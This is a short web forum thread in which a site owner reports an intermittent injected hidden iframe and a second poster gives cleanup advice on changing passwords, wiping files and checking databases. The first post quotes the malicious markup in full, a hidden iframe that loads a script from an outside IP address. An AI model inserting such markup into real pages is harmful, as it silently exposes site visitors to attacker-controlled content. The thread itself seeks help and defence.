Results 1 to 2 of 2
Thread: Iframe injection attack
Apr 30, 2012, 06:46 #1
- Join Date
- Apr 2012
- 0 Post(s)
- 0 Thread(s)
Iframe injection attack
This appears really random , it does not have logic when it is appearing . It may disapear after a few refreshes , or it may be not there for a 1-2 days but after that it appears again.
<div style="visibility:hidden"><iframe src="http://65. 126. 238. 126/scrp.php" width=10 height=10></iframe></div>
If somebody encounter this problem as well please post what you have done in order to get rid of it .
May 12, 2012, 18:53 #2
- Join Date
- Feb 2002
- 19 Post(s)
- 3 Thread(s)
Obviously, your server is NOT secure!
IMMEDIATELY change your cPanel and FTP passwords to something strong (http://strongpasswordgenerator.com has good hints and can generate near-impossible-to-crack passwords for you but be sure to use at least 11 characters which include both cases, digits and special characters - spaces, too, if permitted by your host) THEN DELETE all your files and only then, upload to refresh. If you're using databases, dump EVERYTHING and look through it for a table which doesn't belong and inappropriate values in the table fields (especially for login records).
FWIW, 188.8.131.52 resolves to hu3.hostutopia.net. If that's not you, then they are the ones hacking you (report them to your local police and your host with a DEMAND that they pursue the hacker, too). If that IS you, look for the scrp.php file and see what that's sending to the hacker.